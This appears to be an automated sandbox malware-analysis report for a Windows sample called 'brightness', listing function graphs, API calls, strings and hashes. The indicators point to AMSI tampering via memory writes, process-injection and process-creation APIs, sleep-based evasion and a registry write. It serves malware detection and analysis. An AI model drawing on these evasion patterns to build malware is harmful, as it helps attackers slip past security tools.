                                                                                                                                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                          • API String ID: 2481178504-1225450241
                                                                                                                                                                          • Opcode ID: fda9a8f33de33718ad8340e6684b617414b5505476732234084a9fb7dfca92cb
                                                                                                                                                                          • Instruction ID: cfa628da76a3201dacb14defc9e1a118c8aacc0ffdde658024246a9f5bc57679
                                                                                                                                                                          • Opcode Fuzzy Hash: fda9a8f33de33718ad8340e6684b617414b5505476732234084a9fb7dfca92cb
                                                                                                                                                                          • Instruction Fuzzy Hash: 5243EA35A1022C8FDB14EBA4DDD09DE73F6BFD4304F1054E5E509AB298DA70AE9A8F50
                                                                                                                                                                          Function 02901724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 10611 2901724-2901736 10612 2901968-290196d 10611->10612 10613 290173c-290174c 10611->10613 10616 2901a80-2901a83 10612->10616 10617 2901973-2901984 10612->10617 10614 29017a4-29017ad 10613->10614 10615 290174e-290175b 10613->10615 10614->10615 10622 29017af-29017bb 10614->10622 10618 2901774-2901780 10615->10618 10619 290175d-290176a 10615->10619 10623 2901684-29016ad VirtualAlloc 10616->10623 10624 2901a89-2901a8b 10616->10624 10620 2901986-29019a2 10617->10620 10621 2901938-2901945 10617->10621 10628 29017f0-29017f9 10618->10628 10629 2901782-2901790 10618->10629 10625 2901794-29017a1 10619->10625 10626 290176c-2901770 10619->10626 10632 29019b0-29019bf 10620->10632 10633 29019a4-29019ac 10620->10633 10621->10620 10627 2901947-290195b Sleep 10621->10627 10622->10615 10634 29017bd-29017c9 10622->10634 10630 29016df-29016e5 10623->10630 10631 29016af-29016dc call 2901644 10623->10631 10627->10620 10635 290195d-2901964 Sleep 10627->10635 10641 29017fb-2901808 10628->10641 10642 290182c-2901836 10628->10642 10631->10630 10638 29019c1-29019d5 10632->10638 10639 29019d8-29019e0 10632->10639 10637 2901a0c-2901a22 10633->10637 10634->10615 10640 29017cb-29017de Sleep 10634->10640 10635->10621 10643 2901a24-2901a32 10637->10643 10644 2901a3b-2901a47 10637->10644 10638->10637 10649 29019e2-29019fa 10639->10649 10650 29019fc-29019fe call 29015cc 10639->10650 10640->10615 10648 29017e4-29017eb Sleep 10640->10648 10641->10642 10651 290180a-290181e Sleep 10641->10651 10645 29018a8-29018b4 10642->10645 10646 2901838-2901863 10642->10646 10643->10644 10652 2901a34 10643->10652 10655 2901a68 10644->10655 10656 2901a49-2901a5c 10644->10656 10657 29018b6-29018c8 10645->10657 10658 29018dc-29018eb call 29015cc 10645->10658 10653 2901865-2901873 10646->10653 10654 290187c-290188a 10646->10654 10648->10614 10659 2901a03-2901a0b 10649->10659 10650->10659 10651->10642 10661 2901820-2901827 Sleep 10651->10661 10652->10644 10653->10654 10662 2901875 10653->10662 10663 29018f8 10654->10663 10664 290188c-29018a6 call 2901500 10654->10664 10665 2901a6d-2901a7f 10655->10665 10656->10665 10666 2901a5e-2901a63 call 2901500 10656->10666 10667 29018ca 10657->10667 10668 29018cc-29018da 10657->10668 10670 29018fd-2901936 10658->10670 10676 29018ed-29018f7 10658->10676 10661->10641 10662->10654 10663->10670 10664->10670 10666->10665 10667->10668 10668->10670
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,02902000), ref: 029017D0
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,02902000), ref: 029017E6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                          • Opcode ID: eb384b23d5bd641062a03aa57a5a12a69ba4cd9dc7a6a86fe7d7225261866cc6
                                                                                                                                                                          • Instruction ID: 63f68c174da8f476eba43cd83fab1394ad6432d752aee8dc7fab3e44ffe35a8b
                                                                                                                                                                          • Opcode Fuzzy Hash: eb384b23d5bd641062a03aa57a5a12a69ba4cd9dc7a6a86fe7d7225261866cc6
                                                                                                                                                                          • Instruction Fuzzy Hash: 16B13F72A053658FCB15CF68E8C4366BBE1FB86320F1886AED44D8B3C5C770A555CB90
                                                                                                                                                                          Function 02918704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryW.KERNEL32(amsi), ref: 0291870D
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                            • Part of subcall function 02917CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917D6C
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0291876C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                                                          • String ID: DllGetClassObject$W$amsi
                                                                                                                                                                          • API String ID: 941070894-2671292670
                                                                                                                                                                          • Opcode ID: bc6156c9c0cb1ab66278d5e723926d3230a93379d58fb4b07d151160ec81d4ce
                                                                                                                                                                          • Instruction ID: 5dbae680e385dd17605e5451376f1de0557414cddc9655b3a08fd9d90db1a081
                                                                                                                                                                          • Opcode Fuzzy Hash: bc6156c9c0cb1ab66278d5e723926d3230a93379d58fb4b07d151160ec81d4ce
                                                                                                                                                                          • Instruction Fuzzy Hash: EAF0AF5044C386B9E200E6B98C85F8BBECD4BD2224F048A4CB1E85A2D2D779D1049BB7
                                                                                                                                                                          Function 02901A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 10699 2901a8c-2901a9b 10700 2901aa1-2901aa5 10699->10700 10701 2901b6c-2901b6f 10699->10701 10704 2901aa7-2901aae 10700->10704 10705 2901b08-2901b11 10700->10705 10702 2901b75-2901b7f 10701->10702 10703 2901c5c-2901c60 10701->10703 10706 2901b81-2901b8d 10702->10706 10707 2901b3c-2901b49 10702->10707 10710 2901c66-2901c6b 10703->10710 10711 29016e8-290170b call 2901644 VirtualFree 10703->10711 10708 2901ab0-2901abb 10704->10708 10709 2901adc-2901ade 10704->10709 10705->10704 10712 2901b13-2901b27 Sleep 10705->10712 10713 2901bc4-2901bd2 10706->10713 10714 2901b8f-2901b92 10706->10714 10707->10706 10720 2901b4b-2901b5f Sleep 10707->10720 10715 2901ac4-2901ad9 10708->10715 10716 2901abd-2901ac2 10708->10716 10717 2901ae0-2901af1 10709->10717 10718 2901af3 10709->10718 10727 2901716 10711->10727 10728 290170d-2901714 10711->10728 10712->10704 10719 2901b2d-2901b38 Sleep 10712->10719 10724 2901b96-2901b9a 10713->10724 10726 2901bd4-2901bd9 call 29014c0 10713->10726 10714->10724 10717->10718 10725 2901af6-2901b03 10717->10725 10718->10725 10719->10705 10720->10706 10722 2901b61-2901b68 Sleep 10720->10722 10722->10707 10729 2901bdc-2901be9 10724->10729 10730 2901b9c-2901ba2 10724->10730 10725->10702 10726->10724 10732 2901719-2901723 10727->10732 10728->10732 10729->10730 10736 2901beb-2901bf2 call 29014c0 10729->10736 10733 2901bf4-2901bfe 10730->10733 10734 2901ba4-2901bc2 call 2901500 10730->10734 10738 2901c00-2901c28 VirtualFree 10733->10738 10739 2901c2c-2901c59 call 2901560 10733->10739 10736->10730
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?), ref: 02901B17
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?), ref: 02901B31
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                          • Opcode ID: bd6ed186b5840acd08105496c02275a41056fc41f09835804d8e676cdf6c15f2
                                                                                                                                                                          • Instruction ID: 3658a9e978129b81ce8d73058f744f6ee79b8a52efb09094b5e66cf4c4519e6d
                                                                                                                                                                          • Opcode Fuzzy Hash: bd6ed186b5840acd08105496c02275a41056fc41f09835804d8e676cdf6c15f2
                                                                                                                                                                          • Instruction Fuzzy Hash: 5951DD71A053548FDB15CF6CD9C4766BBD8AB8A324F1885AED44CCB2CAE770C445CBA1
                                                                                                                                                                          Function 0291E72A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0291E86A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                          • Opcode ID: 11a252525ce8d5da872f96644ff934cc2c984a07bae34841f1361200094bd8c5
                                                                                                                                                                          • Instruction ID: 2cc887b31333ac98ab511a26f9d187033f314d37bdd1c4541c03977ac2eaa477
                                                                                                                                                                          • Opcode Fuzzy Hash: 11a252525ce8d5da872f96644ff934cc2c984a07bae34841f1361200094bd8c5
                                                                                                                                                                          • Instruction Fuzzy Hash: 2741F835B1020C9FEB00FBA5D881E9EB7FAEFC8710F215475EA51A7284EA70AD018F50
                                                                                                                                                                          Function 0291881C Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,02918903), ref: 02918850
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02918903), ref: 02918860
                                                                                                                                                                          • GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02918879
                                                                                                                                                                            • Part of subcall function 02917CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917D6C
                                                                                                                                                                          • FreeLibrary.KERNEL32(74AE0000,00000000,02962388,Function_000065D8,00000004,02962398,02962388,000186A3,00000040,0296239C,74AE0000,00000000,00000000,00000000,00000000,02918903), ref: 029188E3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1543721669-0
                                                                                                                                                                          • Opcode ID: a81f288f4c0bcc5914ff66cc18760187e9ec8210bcafa05b9b331596930f4d19
                                                                                                                                                                          • Instruction ID: 437e55626390bae889ae2882933da56954c55d2f0ef777ff74173a8535b786e7
                                                                                                                                                                          • Opcode Fuzzy Hash: a81f288f4c0bcc5914ff66cc18760187e9ec8210bcafa05b9b331596930f4d19
                                                                                                                                                                          • Instruction Fuzzy Hash: EF114F70E4430DAFE700FBE8CC89E6E77EDABC5B00F510464BA04AB6C0DB7899109B54
                                                                                                                                                                          Function 029185D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02918660
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                                                          • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                                                          • API String ID: 3130163322-2353454454
                                                                                                                                                                          • Opcode ID: 137ae62c6f57625fccb6145cdaa947f0330378072a8ccb46e7c7c20f68fd1931
                                                                                                                                                                          • Instruction ID: c41f1de19a2fd282900c0de8991ba475c04996fbf336a4bfd39cb7601c47ab07
                                                                                                                                                                          • Opcode Fuzzy Hash: 137ae62c6f57625fccb6145cdaa947f0330378072a8ccb46e7c7c20f68fd1931
                                                                                                                                                                          • Instruction Fuzzy Hash: 0111D3B1A4420CAFEB40EFA9DD81F9A37EDFB8CB50F514554FA08D7280D634E9109B64
                                                                                                                                                                          Function 02918406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • WinExec.KERNEL32(?,?), ref: 02918470
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                          • String ID: Kernel32$WinExec
                                                                                                                                                                          • API String ID: 2292790416-3609268280
                                                                                                                                                                          • Opcode ID: 4ebf7a966b31e89c6ceffef88034489c72a4f8e44de253d02abba6b50a6ffb3c
                                                                                                                                                                          • Instruction ID: 6003c64ef0c8061847387e4c59112c7a2d3931c869c9c9558772f630b9a5e019
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ebf7a966b31e89c6ceffef88034489c72a4f8e44de253d02abba6b50a6ffb3c
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D016D34A4420CBFFB10EBA5DC86F6A77EDF789B10F518860FA04D66C0DA34A9109A64
                                                                                                                                                                          Function 02918408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • WinExec.KERNEL32(?,?), ref: 02918470
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                          • String ID: Kernel32$WinExec
                                                                                                                                                                          • API String ID: 2292790416-3609268280
                                                                                                                                                                          • Opcode ID: ad6a28fa98a00e5da742d92bf8de265122ba5fcba479fa78f0759b03502d746e
                                                                                                                                                                          • Instruction ID: 3bc4ca0fe8229b8d50c3d51cec850e7bd7ac8abe7384f4a3f6c461d21ddcd755
                                                                                                                                                                          • Opcode Fuzzy Hash: ad6a28fa98a00e5da742d92bf8de265122ba5fcba479fa78f0759b03502d746e
                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF08134A4420CBFFB10EFA5DC86F5A77EDF789B10F518860FA04D76C0DA34A9109A64
                                                                                                                                                                          Function 02915BAC Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02915CF4,?,?,02913880,00000001), ref: 02915C08
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02915CF4,?,?,02913880,00000001), ref: 02915C36
                                                                                                                                                                            • Part of subcall function 02907D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02913880,02915C76,00000000,02915CF4,?,?,02913880), ref: 02907D5E
                                                                                                                                                                            • Part of subcall function 02907F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02913880,02915C91,00000000,02915CF4,?,?,02913880,00000001), ref: 02907F37
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,02915CF4,?,?,02913880,00000001), ref: 02915C9B
                                                                                                                                                                            • Part of subcall function 0290A6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0290C359,00000000,0290C3B3), ref: 0290A717
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 503785936-0
                                                                                                                                                                          • Opcode ID: 8a56c611ef4a86a867912a4696e1b2ced10914ebb410535f461ade0b4f330461
                                                                                                                                                                          • Instruction ID: 57c87a81e8e3f3263e44e43251ebc26d265a5b6f7623bc5f92090318e3dfd9d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a56c611ef4a86a867912a4696e1b2ced10914ebb410535f461ade0b4f330461
                                                                                                                                                                          • Instruction Fuzzy Hash: 03317030A0430D9FEB00EFA9C8C1BAEB7F6AF88714F918465E514AB3C0D7755A058FA5
                                                                                                                                                                          Function 0291EAF2 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02A56914), ref: 0291EB38
                                                                                                                                                                          • RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,0291EBA3), ref: 0291EB70
